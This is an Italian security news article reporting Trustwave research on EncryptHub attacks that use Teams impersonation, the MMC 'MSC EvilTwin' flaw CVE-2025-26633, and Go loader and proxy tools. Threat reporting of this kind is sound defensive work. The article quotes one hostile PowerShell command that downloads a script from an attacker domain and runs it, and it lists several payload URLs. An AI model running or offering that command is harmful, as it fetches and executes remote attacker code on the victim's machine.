Redazione RHC : 15 Agosto 2025 14:42
Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.
Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.
Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:
Vuoi diventare un esperto del Dark Web e della Cyber Threat Intelligence (CTI)?Stiamo per avviare il corso intermedio in modalità "Live Class" del corso "Dark Web & Cyber Threat Intelligence". A differenza dei corsi in e-learning, disponibili online sulla nostra piattaforma con lezioni pre-registrate, i corsi in Live Class offrono un’esperienza formativa interattiva e coinvolgente. Condotti dal professor Pietro Melillo, le lezioni si svolgono online in tempo reale, permettendo ai partecipanti di interagire direttamente con il docente e approfondire i contenuti in modo personalizzato. Questi corsi, ideali per aziende, consentono di sviluppare competenze mirate, affrontare casi pratici e personalizzare il percorso formativo in base alle esigenze specifiche del team, garantendo un apprendimento efficace e immediatamente applicabile. Guarda subito l'anteprima gratuita del corso su academy.redhotcyber.com Contattaci per ulteriori informazioni tramite WhatsApp al 375 593 1011 oppure scrivi a [email protected]  Supporta RHC attraverso:
Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì. |
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”
Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.
Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.
Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.
Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.
Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.
Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.
Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a https://ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.
RedazioneBroadcom ha risolto una grave vulnerabilità di escalation dei privilegi in VMware Aria Operations e VMware Tools, che era stata sfruttata in attacchi a partire da ottobre 2024. Al problema è stato a...
In un settore un tempo dominato da star dal vivo, i personaggi digitali si stanno facendo sempre più strada. Durante un summit a Zurigo, Ellin van der Velden, attrice, comica e tecnologa, ha annuncia...
La Cybersecurity and Infrastructure Security Agency (CISA) degli Stati Uniti ha aggiunto una vulnerabilità critica nella popolare utility Sudo, utilizzata su sistemi Linux e Unix-like, al suo catalog...
Negli ultimi anni gli attacchi informatici sono diventati una delle principali minacce per le aziende, indipendentemente dal settore. Se i reparti tecnici si concentrano sulla risoluzione dei problemi...
Nel 2025 l’Unione Europea vuole avere il controllo totale sulle chat private. Il Regolamento “Chat Control” (proposta COM(2022)209) promette di combattere la pornografia minorile con la scansion...
